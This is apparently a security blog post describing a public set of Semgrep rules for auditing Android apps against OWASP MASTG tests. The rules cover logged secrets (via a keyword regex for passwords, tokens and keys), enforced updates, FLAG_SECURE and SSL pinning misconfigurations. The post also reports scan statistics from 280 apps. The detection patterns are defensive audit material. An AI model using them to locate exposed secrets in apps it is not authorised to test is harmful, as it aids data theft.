<table class="tg" style="border-collapse: collapse; border-spacing: 0px;"><thead><tr><th style="border-color: inherit; border-style: solid; border-width: 1px; color: #f56b00; font-family: Arial, sans-serif; font-size: 14px; font-weight: bold; overflow: hidden; padding: 10px 5px; text-align: center; vertical-align: top; word-break: normal;">...</th><th style="border-color: rgb(0, 0, 0); border-style: solid; border-width: 1px; font-family: Arial, sans-serif; font-size: 14px; font-weight: normal; overflow: hidden; padding: 10px 5px; text-align: left; vertical-align: top; word-break: normal;"><span style="font-weight: 400;">Match a sequence of zero or more items such as arguments, statements, parameters, fields, characters.</span></th></tr></thead><tbody><tr><td style="border-color: inherit; border-style: solid; border-width: 1px; color: #f56b00; font-family: Arial, sans-serif; font-size: 14px; font-weight: bold; overflow: hidden; padding: 10px 5px; text-align: center; vertical-align: top; word-break: normal;">"..."</td><td style="border-color: inherit; border-style: solid; border-width: 1px; font-family: Arial, sans-serif; font-size: 14px; overflow: hidden; padding: 10px 5px; text-align: left; vertical-align: top; word-break: normal;"><span style="font-weight: 400;">Match any single hardcoded string.</span></td></tr><tr><td style="border-color: inherit; border-style: solid; border-width: 1px; color: #f56b00; font-family: Arial, sans-serif; font-size: 14px; font-weight: bold; overflow: hidden; padding: 10px 5px; text-align: center; vertical-align: top; word-break: normal;">$A</td><td style="border-color: inherit; border-style: solid; border-width: 1px; font-family: Arial, sans-serif; font-size: 14px; overflow: hidden; padding: 10px 5px; text-align: left; vertical-align: top; word-break: normal;"><span style="font-weight: 400;">Match variables, functions, arguments, classes, object methods, imports, exceptions, and more.</span></td></tr><tr><td style="border-color: inherit; border-style: solid; border-width: 1px; color: #f56b00; font-family: Arial, sans-serif; font-size: 14px; font-weight: bold; overflow: hidden; padding: 10px 5px; text-align: center; vertical-align: top; word-break: normal;"><... e ...></td><td style="border-color: inherit; border-style: solid; border-width: 1px; font-family: Arial, sans-serif; font-size: 14px; overflow: hidden; padding: 10px 5px; text-align: left; vertical-align: top; word-break: normal;"><span style="font-weight: 400;">Match an expression ("e") that could be deeply nested within another expression.</span></td></tr></tbody></table>
<div>
<br /></div><div>Moreover, Semgrep provides several <b>experimental modes</b> that could be really useful in more difficult situations:</div><div><ul><li><b><a href="https://semgrep.dev/docs/writing-rules/data-flow/taint-mode/" target="_blank">taint</a></b>: It enables the data-flow analysis feature allowing to specify <b>sources</b> and <b>sinks</b>.</li><li><b><a href="https://semgrep.dev/docs/writing-rules/experiments/join-mode/overview/">join</a></b>: It allows to use <b>multiple rules</b> on more than one file and to join the results.</li><li><b><a href="https://semgrep.dev/docs/writing-rules/experiments/extract-mode/#introduction" target="_blank">extract</a></b>: It allows work with source file that contains <b>different programming languages</b>.</li></ul><div>Suppose to have a rules collection in the directory "myrules/" and a target source code "mytarget/". To launch a Semgrep scan is very simple:</div></div></div></div><div><pre><code style="border-radius: 10px;">semgrep -c ./myrules ./mytarget</code></pre></div><div><br /></div><span><a name='more'></a></span><h2 style="text-align: left;">The Project:</h2><h2 style="text-align: left;">Semgrep Rules for Android Application Security</h2><h4 style="text-align: left;">The proposal</h4><div><div>In March 2023, the <b>IMQ Minded Security</b> team, with the purpose of contributing to the ethical hacking and mobile development communities, began the "Semgrep Rules for Android Application Security" project. The primary objective of this project is to provide a collection of Semgrep rules that cover the static tests described in the OWASP Mobile Application Security Testing Guide (MASTG) for Android applications. The project has been publicly released on the IMQ Minded Security official GitHub page:</div><div><ul style="text-align: left;"><li><a href="https://github.com/mindedsecurity/semgrep-rules-android-security" target="_blank">https://github.com/mindedsecurity/semgrep-rules-android-security</a></li></ul></div><div><br /></div><div>Currently, the project boasts more than 10 internal and external contributors with different degrees of seniority.</div></div><div><div><b>Supervisor</b>:</div><div><ul style="text-align: left;"><li>Stefano Di Paola (Twitter: <a href="https://twitter.com/WisecWisec" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@WisecWisec</a>)</li></ul></div><div><b>Project leader</b>:</div><div><ul style="text-align: left;"><li>Riccardo Cardelli (Github: <a href="https://github.com/gand3lf" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@gand3lf</a>)</li></ul></div><div><b>Contributors (In alphabetical order)</b>: </div><div><ul style="text-align: left;"><li>Andrea Agnello (Github: <a href="https://github.com/andrenoli" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@</a><span style="background-color: #f8f8f8; box-sizing: border-box; color: #1d1c1d; font-family: Arial; font-size: 15px; white-space-collapse: preserve;"><a href="https://github.com/andrenoli" style="background-color: transparent; box-sizing: border-box; color: #3d81ee; text-decoration-line: none;" target="_blank">AndreNoli</a></span>)</li><li>Christian Cotignola (Twitter: <a href="https://twitter.com/b4dsheep" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@b4dsheep</a>)</li><li>Federico Dotta (Twitter: <a href="https://twitter.com/apps3c" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@apps3c</a>)</li><li>Giacomo Zorzin (Mastodon: <a href="https://infosec.exchange/@gellge" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@gellge</a>)</li><li>Giovanni Fazi (Github: <a href="https://github.com/giovifazi" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@giovifazi</a>)</li><li>Martino Lessio (Twitter: <a href="https://twitter.com/martinolessio" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@Martinolessio</a>)</li><li>Maurizio Siddu (Github: <a href="https://github.com/akabe1" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@akabe1</a>)</li><li>Michele Di Bonaventura (Twitter: <a href="https://twitter.com/cyberaz0r" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@cyberaz0r</a>)</li><li>Michele Tumolo (Twitter: <a href="https://twitter.com/0s0urce" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@0s0urce</a>)</li><li>Riccardo Granata (Github <a href="https://github.com/riccardogranata" style="box-sizing: border-box; color: #3d81ee; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; text-decoration-line: none;" target="_blank">@riccardogranata</a>)</li></ul></div></div><div><div style="text-align: left;">The "<i><a href="https://github.com/mindedsecurity/semgrep-rules-android-security" target="_blank">Semgrep Rules for Android Application Security</a></i>" project does not cover the entire OWASP MASTG tests due to the intrinsic constraints of a mobile application SAST activity:</div><div><ul style="text-align: left;"><li>The back-end source code is out of scope.</li><li>The dynamic tests are out of scope.</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhri04T_tuzbsGPMMCkTEq9hgn7d4LvuGSVq8-gdJYivcKf5gY6gdQxnew1bF01N1os4i_pfMjiAg9NbQkhNDksijUCNQAM3yfESgnq-IlBrF0yKZDrV0JwleHiNwG6x16Dcg6JnqUFuP2ryZJR7Sifs5pPpBLGPqOioHgWs8yq5bHQKxd8C37KSM5wYuM/s1353/mastg_1_5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="635" data-original-width="1353" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhri04T_tuzbsGPMMCkTEq9hgn7d4LvuGSVq8-gdJYivcKf5gY6gdQxnew1bF01N1os4i_pfMjiAg9NbQkhNDksijUCNQAM3yfESgnq-IlBrF0yKZDrV0JwleHiNwG6x16Dcg6JnqUFuP2ryZJR7Sifs5pPpBLGPqOioHgWs8yq5bHQKxd8C37KSM5wYuM/s16000/mastg_1_5.png" /></a></div><div><br /></div></div></div><div>To use the project during an MAPT activity is very simple:</div><div><br /></div><div><pre><code style="border-radius: 10px;"># Download the target APK and the rules of the current project
$ git clone https://github.com/mindedsecurity/semgrep-rules-android-security
# Extract and decompile the source code from the target APK file
$ jadx -d target_src target.apk
# To use the .semgrepignore file launch the scan from the project folder
$ cd semgrep-rules-android-security/<br /># Run Semgrep with the new security rules
$ semgrep -c ./rules/ ../target_src/
<br /></code></pre><h2 style="text-align: left;"><br /></h2><h2 style="text-align: left;">Some Implemented Rules</h2></div><div>The rules implemented are <b>more than 40</b> and this section contains a detailed description of four of the Semgrep rules included in the <i>"Semgrep Rules for Android Application Security"</i> project.</div><div><br /></div><h4 style="text-align: left;">MSTG-STORAGE-3</h4><div><div>The detailed description of the current test can be visited at the following MASTG 1.5.0 reference:</div><div><ul style="text-align: left;"><li><a href="https://github.com/OWASP/owasp-mastg/blob/v1.5.0/Document/0x05d-Testing-Data-Storage.md#testing-logs-for-sensitive-data-mstg-storage-3">https://github.com/OWASP/owasp-mastg/blob/v1.5.0/Document/0x05d-Testing-Data-Storage.md#testing-logs-for-sensitive-data-mstg-storage-3</a></li></ul></div><div>As stated in the MSTG-STORAGE-3 test, the purpose involves identifying any <b>sensitive data</b> within both system and <b>application logs</b>.</div><div>For doing this, it is important to retrieve two information:</div><div><ol style="text-align: left;"><li>The methods and classes that are delegated to perform logging operations.</li><li>A regex that can be used to identify potentially sensitive data and attributes names.</li></ol></div><div>The first information can be partially retrieved in the <i>MSTG-STORAGE-3</i> description. The identified methods are the following:</div><div><ul style="text-align: left;"><li><i>Log.v | Log.i | Log.w | Log.e | Log.wtf</i></li><li><i>System.out.print | System.err.print | System.out.println | System.err.println</i></li><li><i>Logger.log | Logger.info | Logger.logp | Logger.logrb | Logger.severe | Logger.warning</i></li></ul></div><div>Please note that the "<i>Log.d</i>" method is not included in the list because it prints log data only if the Android manifest contains the flag "<i>android:debuggable</i>" set to true. This requirement is verified by another implemented rule.</div><div>About the second information, the regex used to identify secrets inside the source code is the following:</div><div><i><span style="color: #38761d;">.*(?i)(key|secret|password|pwd|passwd|token|salt|seed|salt|bearer|otp|crypt|auth(?-i)|IV).*</span></i></div><div><br /></div><div>The following snippet shows the result translated in Semgrep rule pattern language:</div></div>
<pre style="line-height: 1.4;"><code class="yaml" style="border-radius: 10px;"> message: The application writes sensitive data in application logs.
patterns:
- pattern-either:
- pattern: Log.v(...);
- pattern: Log.i(...);
- pattern: Log.w(...);
- pattern: Log.e(...);
- pattern: Log.wtf(...);
- pattern: System.$X.print(...);
- pattern: System.$X.println(...);
- pattern: (BufferedWriter $X).write(...);
- pattern: (Logger $X).log(...);
- pattern: (Logger $X).info(...);
- pattern: (Logger $X).logp(...);
- pattern: (Logger $X).logrb(...);
- pattern: (Logger $X).severe(...);
- pattern: (Logger $X).warning(...);
- pattern-regex: .*(?i)(key|secret|password|pwd|...|bearer|otp|crypt|auth(?-i)|IV).*</code></pre>
<div>Patterns nested under a "patterns" node operate with a <b>logical AND</b> condition, whereas the "pattern-either" is used to represent a <b>logical OR</b> condition. The following pattern is equivalent to the logical condition <i>(A OR B) AND C</i>.</div>
<pre style="line-height: 1.4;"><code class="yaml" style="border-radius: 10px;">patterns:
- pattern-either:
- pattern: A
- pattern: B
- pattern: C</code></pre><div><div>The final version of the rule can be consulted here:</div></div><div><ul><li><a href="https://github.com/mindedsecurity/semgrep-rules-android-security/blob/main/rules/storage/mstg-storage-3.yaml">https://github.com/mindedsecurity/semgrep-rules-android-security/blob/main/rules/storage/mstg-storage-3.yaml</a></li></ul></div><div><br /></div><h4 style="text-align: left;">MSTG-ARCH-9</h4><div><div>The purpose of this test is to verify that the application <b>enforces updates</b>. This requirement regards applications with <b>L2</b> as <b>verification level</b>, such as banking applications, healthcare portals, government application, e-commerce platforms, and more. To ensure that these targets have the latest security patches installed, they should be required to use the most recent version of the application.</div><div>The details of the test can be consulted at the following link:</div><div><ul style="text-align: left;"><li><a href="https://github.com/OWASP/owasp-mastg/blob/v1.5.0/Document/0x05h-Testing-Platform-Interaction.md#testing-enforced-updating-mstg-arch-9">https://github.com/OWASP/owasp-mastg/blob/v1.5.0/Document/0x05h-Testing-Platform-Interaction.md#testing-enforced-updating-mstg-arch-9</a></li></ul></div><div>To update an Android application programmatically, at least three steps are required:</div><div><ol style="text-align: left;"><li>Check for updates ("<i>getAppUpdateInfo(...)</i>").</li><li>Request the update ("<i>startUpdateFlowForResult(...)</i>").</li><li>Check if the update is completed successfully.</li></ol></div><div>The fundamental step that should be detected by the Semgrep rule is the second one. Unfortunately, it is necessary to face with a Semgrep <b>limitation</b>:</div><div><i>At the current version, Semgrep does not provide a mechanism to detect the absence of a pattern</i>.</div><div>(Visit the link for further information: <a href="https://github.com/returntocorp/semgrep/issues/7363">https://github.com/returntocorp/semgrep/issues/7363</a>)</div><div><br /></div><div><div>In other words, when dealing with a source code composed of N files, it is not possible to detect the absence of a pattern among all these files using Semgrep. However, it is possible to detect the absence of a pattern within a <b>single</b> specific file.</div></div><div><br /></div><div>Thus, the adopted strategy is the following:</div><div>1. The main activity is the file that is most likely to enforce the update. This is necessary to confine the search to one single file. To identify the main activity class, it is sufficient to look for the activity with the action "<i>android.intent.action.MAIN</i>" and the category "<i>android.intent.category.LAUNCHER</i>" inside the "intent-activity" element.</div></div><div><br /></div>
<pre style="line-height: 1.4;"><code class="xquery" style="border-radius: 10px;"><!-- AndroidManifest.xml -->
<activity android:name="com.myexample.test.SplashScreen">
<intent-filter>
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
</intent-filter>
</activity></code></pre>
<div><br /></div><div>2. The application must call the method "startUpdateFlowForResult" to enforce the application update.</div><div><br /></div><div>Clearly, this rule requires dealing with files in different format: XML and Java.</div><div>In this situation, it is possible to use the Semgrep join mode, that allows to combine results from different rules:</div><div><ul style="text-align: left;"><li><a href="https://semgrep.dev/docs/writing-rules/experiments/join-mode/overview/">https://semgrep.dev/docs/writing-rules/experiments/join-mode/overview/</a></li></ul></div><div>The "on" directive allows to specify constraints that must match between the result of the rules. Consider the following example of join mode:</div>
<pre style="line-height: 1.4;"><code class="yaml" style="border-radius: 10px;">rules:
-id: join-rule-id
mode: join
join:
rules:
- id: rule1
languages: # . . .
pattern: # . . .
- id: rule2
languages: # . . .
pattern: # . . .
on:
- 'rule1.$A == rule2.$B' # 1
- 'rule1.$X > rule2.$Y' # 2</code></pre>
<div><br /></div><div><div>Consider the "on" conditions in AND logic:</div><div><ul style="text-align: left;"><li>"<i># 1</i>": the metavariable <i>$A</i> is equal to the metavariable <i>$B</i></li><li>"<i># 2</i>": the metavariable <i>$X</i> contains the metavariable <i>$Y</i></li></ul></div><div>The following snippet reports the implemented rule to cover the MSTG-ARCH-9 test.</div></div>
<pre style="line-height: 1.4;"><code class="yaml" style="border-radius: 10px;"> mode: join
join:
rules:
- id: activity-without-update
languages:
- java
patterns: # 1
- pattern: |
public class $CLASSNAME extends $ACTIVITY{
public void onCreate(...){...}
}
- pattern-not: |
public class $CLASSNAME extends $ACTIVITY{
$X(...){
...
(AppUpdateManager $Y).startUpdateFlowForResult(...);
...
}
}
- focus-metavariable:
- $CLASSNAME
- id: main-activity
languages:
- xml
patterns: # 2
- pattern: |
<activity ... android:name="$ACT" ...> ...
<intent-filter> ...
<action android:name="android.intent.action.MAIN"/> ...
<category android:name="android.intent.category.LAUNCHER"/> ...
</intent-filter> ...
</activity>
- focus-metavariable:
- $ACT
on:
- 'main-activity.$ACT > activity-without-update.$CLASSNAME'</code></pre>
<div><br /></div><div><div>The first pattern ("<i># 1</i>") matches any Java class that does not use the method "startUpdateFlowForResult" focusing the class name with the "focus-metavariable" directive. The second pattern ("<i># 2</i>") retrieves, inside the "AndroidManifest.xml" file, the name of the main activity.</div><div><br /></div><div>The condition "<i>main-activity.$ACT > activity-without-update.$CLASSNAME</i>" means that the metavariable <i>$ACT</i> (from the "main-activity" rule) has to contain the value of the metavariable <i>$CLASSNAME</i> (from the "activity-without-update" rule).</div><div><br /></div><div>Combining what has been written, the rule presented verifies exactly that the main activity of the target application contains a call to the standard method used to update the Android applications.</div></div><div><div>The most updated version of the rule can be consulted here:</div><div><ul><li><a href="https://github.com/mindedsecurity/semgrep-rules-android-security/blob/main/rules/arch/mstg-arch-9.yaml">https://github.com/mindedsecurity/semgrep-rules-android-security/blob/main/rules/arch/mstg-arch-9.yaml</a></li></ul></div></div><h4 style="text-align: left;"><br /></h4><h4 style="text-align: left;">MSTG-STORAGE-9</h4><div><div>To prevent malicious applications from taking <b>screenshots</b> of <b>sensitive information</b>, it is a good security practice to disable the screenshot functionality when using applications that display sensitive information.</div><div>The OWASP MASTG provides details on how to correctly configure the application:</div><div><ul style="text-align: left;"><li><a href="https://github.com/OWASP/owasp-mastg/blob/v1.5.0/Document/0x05d-Testing-Data-Storage.md#finding-sensitive-information-in-auto-generated-screenshots-mstg-storage-9">https://github.com/OWASP/owasp-mastg/blob/v1.5.0/Document/0x05d-Testing-Data-Storage.md#finding-sensitive-information-in-auto-generated-screenshots-mstg-storage-9</a></li></ul></div><div>This topic has been extensively described in this blog in 2021 by the software security expert Martino Lessio:</div><div><ul style="text-align: left;"><li><a href="https://blog.mindedsecurity.com/2021/05/mobile-screenshot-prevention-cheatsheet.html">https://blog.mindedsecurity.com/2021/05/mobile-screenshot-prevention-cheatsheet.html</a></li></ul></div><div>The Android Window object can be retrieved using the "<i>getWindow</i>" method and contains all the methods to interact with the application screen view.</div><div>In particular, the "<i>setFlags</i>" and "<i>addFlags</i>" methods permit to associate some features to the window.</div></div><div><br /></div>
<pre style="line-height: 1.4;"><code class="java" style="border-radius: 10px;">public void setFlags (int flags, int mask)
public void addFlags (int flags)</code></pre>
<div><br /></div><div><div>One of these features is "<b>FLAG_SECURE</b>", that states:</div><div>"Treat the content of the window as secure, preventing it from appearing in screenshots or from being viewed on non-secure displays."</div><div>The constant value associated to the flag is 8192 (<i>0x00002000</i>).</div><div><br /></div><div>To detect an insecure use of the "setFlags" method, the following rule can be used:</div></div><div><br /></div>
<pre style="line-height: 1.4;"><code class="yaml" style="border-radius: 10px;">- patterns:
- pattern-either:
- pattern: getWindow().setFlags($P1, $P2)
- pattern: (...).getWindow().setFlags($P1, $P2)
- pattern: (Window $W).setFlags($P1, $P2)
- metavariable-comparison:
comparison: $P1 & 8192 == 0</code></pre>
<div><br /></div><div>Moreover, the default value of the window flags does not include the "<i>FLAG_SECURE</i>" by default, so we have to detect all activities that do not include this flag explicitly:</div><div><br /></div>
<pre style="line-height: 1.4;"><code class="yaml" style="border-radius: 10px;">- patterns:
- pattern: public class $CLASS extends $ACT{ ... }
- pattern-not: |
public class $CLASS{...
$M(...){...
(...).addFlags(...);
...}
...}
- pattern-not: |
public class $CLASS{...
$M(...){...
(...).setFlags(...);
...}
...}
- metavariable-regex:
metavariable: $ACT
regex: .*Activity.*</code></pre>
<div><br /></div><div><div>Unfortunately, it is not possible to exhaustively cover the misuse of "addFlags" due to a Semgrep limitation. In other words, it is not possible to search for a method that does not contain an "addFlags" call with a parameter that adheres to specific characteristics.</div><div>In this case, what we can do is the following attempt:</div></div><div><br /></div>
<pre style="line-height: 1.4;"><code class="yaml" style="border-radius: 10px;">- patterns:
- pattern-either:
- pattern: getWindow().addFlags($P1, $P2)
- pattern: (...).getWindow().addFlags($P1, $P2)
- pattern: (Window $W).addFlags($P1, $P2)
- metavariable-comparison:
comparison: $P1 & 8192 == 0</code></pre>
<div><br /></div><div><div>Similarly to the previous case, this snippet detect each "<i>addFlags</i>" call that does not use the "<i>FLAG_SECURE</i>".</div><div>This approach can introduce false positives, such as:</div></div><div><br /></div>
<pre style="line-height: 1.4;"><code class="java" style="border-radius: 10px;">public class MainActivity extends AppCompatActivity {
private void test(){
getWindow().addFlags(222); // This triggers the rule, generating a false positive
getWindow().addFlags(8192); // FLAG_SECURE
}
}</code></pre>
<div><br /></div><div>The most updated version of the rule can be consulted here:</div><div><ul style="text-align: left;"><li><a href="https://github.com/mindedsecurity/semgrep-rules-android-security/blob/main/rules/storage/mstg-storage-9.yaml">https://github.com/mindedsecurity/semgrep-rules-android-security/blob/main/rules/storage/mstg-storage-9.yaml</a></li></ul><h4 style="text-align: left;"><br /></h4><h4 style="text-align: left;">MSTG-NETWORK-4</h4></div><div><div>The last rule shown on this post is described at the following link:</div><div><ul style="text-align: left;"><li><a href="https://github.com/OWASP/owasp-mastg/blob/v1.5.0/Document/0x05g-Testing-Network-Communication.md#testing-custom-certificate-stores-and-certificate-pinning-mstg-network-4">https://github.com/OWASP/owasp-mastg/blob/v1.5.0/Document/0x05g-Testing-Network-Communication.md#testing-custom-certificate-stores-and-certificate-pinning-mstg-network-4</a></li></ul></div><div>Typically, tests regarding SSL pinning are performed dynamically using tools such as Frida, Objection and others. These tools help penetration testers to bypass the implementation of SSL pinning but does not analyze in details the presence of potential misconfigurations.</div><div><br /></div><div>To validate the <b>SSL pinning configuration</b>, it is necessary to analyze both the Network Security Configuration file ("network_security_config.xml") and the Java source code of the application.</div><div><br /></div><div>Thus, the rule has been splitted as follows:</div><div><ul style="text-align: left;"><li><b>mstg-network-4.1.yaml</b> ⇒ Rule to analyze misconfiguration inside the "network_security_config.xml" file.</li><li><b>mstg-network-4.1.xml</b> ⇒ Example of "network_security_config.xml" vulnerable file.</li><li><b>mstg-network-4.2.yaml</b> ⇒ Eule to detect security issues inside the Java source code.</li><li><b>mstg-network-4.2.java</b> ⇒ Example of insecure use of pinning inside the Java source code.</li></ul>The rule "<i>mstg-network-4.1.yaml</i>" performs four checks:</div><div><ul style="text-align: left;"><li>It verifies the presence of the pin expiration date.</li><li>It verifies that the pin expiration date is not expired.</li><li>It verifies the presence of a backup pin.</li><li>It verifies that the trust-anchors does not use user-level certificates.</li></ul></div>
<pre style="line-height: 1.4;"><code class="yaml" style="border-radius: 10px;"> pattern-either:
# Pin expiration not present
- patterns:
- pattern: <pin-set ... />
- pattern-not: <pin-set expiration="..." />
# Pin expired
- patterns:
- pattern: <pin-set expiration="$X" />
- metavariable-comparison:
comparison: strptime($X) < today()
# Backup pin not present
- patterns:
- pattern: <pin-set ... />
- pattern-not: <pin-set><pin/><pin/></pin-set>
# Trust anchors contains user certificates
- patterns:
- pattern: <trust-anchors>...<certificates src="user" />...</trust-anchors></code></pre>
</div><div><br /></div><div><div>On the other side, the "<i>mstg-network-4.2.java</i>" performs four additional checks:</div><div><ul style="text-align: left;"><li>It verifies that the "<i>SSLContext</i>" is correctly initialized.</li><li>It verifies that the "<i>TrustManagerFactory</i>" is correctly initialized.</li><li>It verifies that the certificate pin does not use the SHA1 deprecated hashing function.</li><li>It verifies that an "<i>HttpsURLConnection</i>" object calls the "connect" method only if the "<i>SSLSocketFactory</i>" has been configured.</li></ul></div></div>
<pre style="line-height: 1.4;"><code class="yaml" style="border-radius: 10px;"> pattern-either:
- pattern: (SSLContext $X).init($P1, null, $P3);
- pattern: (TrustManagerFactory $X).init(null);
- patterns:
- pattern: new CertificatePinner.Builder().add("$D", "$P")
- metavariable-regex:
metavariable: $P
regex: .*(?i)(sha1/).*
- patterns:
- pattern: (HttpsURLConnection $X).connect();
- pattern-not-inside: |
(HttpsURLConnection $X).setSSLSocketFactory(...);
...
(HttpsURLConnection $X).connect();</code></pre>
<div><br /></div><div><br /></div><h2 style="text-align: left;">Tests and Results</h2><div><div>The project's goal does not consist in generating a large number of false positives that are subsequently reviewed by penetration testers. Instead, the real goal is to find a balance that <b>minimizes both false positives and false negatives</b>, thereby maximizing the reliability of each rule.</div><div>To test the implemented Semgrep rules, this specific workflow has been used:</div><div><ol style="text-align: left;"><li>Download an Android application.</li><li>Extract and decompile the code with <i>JADX</i>.</li><li>Upload the source code on a cloud storage.</li><li>Analyze the application source code, one application at the time.</li></ol></div><div><br /></div><div>During the first three phases, we have collected <b>280 Android applications</b> belonging to different topics with a very high number of total download: <b>more than 111 billions</b>!</div></div><div>The following graph shows the number of application per categories that have been included in the analysis.</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuqkKfeYeKeBbNsfu1Rj981rw_sBdBzgenkjVCd6LyLIN3ivf27ZirNBv6qdu-ABx6l6FWFUGNkT62PDmeNDSf5gC4bU20X-EiczNO_UHLe3rvBFSsJP3uYgltnPHlMXAiYNxp8itVv3ZSu3W9YGWkC1T-NdoVfco-yoh6beVi7zapA1jvK3cXWaMvOpc/s1352/app_categories.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="419" data-original-width="1352" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuqkKfeYeKeBbNsfu1Rj981rw_sBdBzgenkjVCd6LyLIN3ivf27ZirNBv6qdu-ABx6l6FWFUGNkT62PDmeNDSf5gC4bU20X-EiczNO_UHLe3rvBFSsJP3uYgltnPHlMXAiYNxp8itVv3ZSu3W9YGWkC1T-NdoVfco-yoh6beVi7zapA1jvK3cXWaMvOpc/s16000/app_categories.png" /></a></div><div><br /></div><div>The results are interesting under the quantitative point of view. During the stress test we aimed to verify:</div><div><ul style="text-align: left;"><li>The presence of rules associated to an high number of results, potentially false positives.</li><li>The average number of findings per application. This value has to be maintained in a reasonable range in order to allow a security expert to read and verify each result.</li><li>The speed of each rule in order to detect eventual bottleneck.</li></ul></div><div>The following graph shows the results of the stress test:</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZQWE5pYNQ-qLjUHAlXc-QiYxQqu2BAf6uJFH1n6cj1timOgyXgNzl52X6_n3PZO4zTXO5mL6QhTVE5wPpu4ucQkxQZmxBagHxG1m0pcy70cP_pYADgybs4FpqLbHVv8NV3xYOqSzdiw9sYUv7HFYgsk26C7A6_6ibFT3IKo6_cpMRUekIT0NsOUo2wJ0/s1359/app_results.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="447" data-original-width="1359" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZQWE5pYNQ-qLjUHAlXc-QiYxQqu2BAf6uJFH1n6cj1timOgyXgNzl52X6_n3PZO4zTXO5mL6QhTVE5wPpu4ucQkxQZmxBagHxG1m0pcy70cP_pYADgybs4FpqLbHVv8NV3xYOqSzdiw9sYUv7HFYgsk26C7A6_6ibFT3IKo6_cpMRUekIT0NsOUo2wJ0/s16000/app_results.png" /></a></div><br /><div><div>Analyzing the results of the scan it has been possible to infer the following information:</div><div><ul style="text-align: left;"><li>Total number of findings: <b>107173</b>.</li><li>Average number of findings per application: <b>382</b>.</li><li>Most impacted categories: <b>storage</b>, <b>code</b>, <b>platform</b>.</li><li>The rule about memory leaks potentially produces an high number of findings ("MSTG-CODE-8.X").</li></ul></div></div><h2 style="text-align: left;">Future</h2><div><div>The general idea for the future of the project is to keep the rules updated. Specifically, the project will increasingly focus on improving the following three aspects.</div><div><br /></div><div><b>The new OWASP MATGS 2.0</b>:</div><div>Currently, the project is aligned with version 1.5 of the OWASP MASTG, but version <b><a href="https://mas.owasp.org/news/">2.0</a></b> is on the horizon and promises to make tests more atomic and consistent. The IMQ Minded Security team is actively working to prepare for this important update by aligning the current rules with the future OWASP MASTG version.</div><div><br /></div><div><b>High impact rules</b>:</div><div>To cover an entire testing guide with a tool is an ambitious project that requires time, effort, and expertise. For this reason, we will continue to release new rules focusing on detecting the presence of high-impact vulnerabilities. Stay tuned and always update the ruleset!</div><div><br /></div><div><b>Generalization of rules</b>:</div><div>There are many different ways to implement the same code, depending on the specific programming language, the desired algorithm, and the programmer's personal preferences. For these reasons, it is difficult to implement rules that cover every specific scenario. The current version of the project focuses on the most standard cases and best practices, but some rules need to be updated to detect various forms of the same vulnerable pattern.</div></div><div><br /></div><div><h2>Talks & Events</h2><div><ul style="text-align: left;"><li><b>11 Sep 2023</b>: OWASP Italy Day</li></ul><div class="separator" style="clear: both; text-align: left;">
